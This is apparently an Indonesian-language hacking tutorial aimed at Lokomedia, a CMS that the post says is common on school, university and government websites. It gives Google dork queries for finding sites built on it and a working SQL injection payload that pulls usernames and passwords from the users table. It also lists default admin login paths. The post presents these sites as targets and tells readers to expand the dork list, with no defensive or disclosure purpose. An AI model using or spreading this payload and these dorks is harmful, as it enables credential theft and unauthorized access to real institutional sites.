Lokomedia ialah sebuah cms karya anak bangsa yang sering digunakan untuk situs website sekolah, universitas, pemerintah dan apapun itu. Ya memang seharusnya ini paling didukung dan diapresiasi, tapi sebab bugnya yang fatal cms ini tidak jarang kali jadi sasaran.
Bug pada cms ini ialah sql injection. Jika belum paham tentang sql injection kalian biasa menyimak artikelnya disini. Kalo udah yaudah lanjut.
Dork:
inurl:/statis-1-profil.html
inurl:/statis-3-strukturorganisasi.html
inurl:/statis-1-visimisi.html
inurl:/statis-1-tujuan.html
Kembangin lagi gan.
Exploit:
‘union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)–+
Default admin login:
/admin
/adminweb
/administrator
/redaktur
Selengkapnya baca di SQL Injection Lokomedia.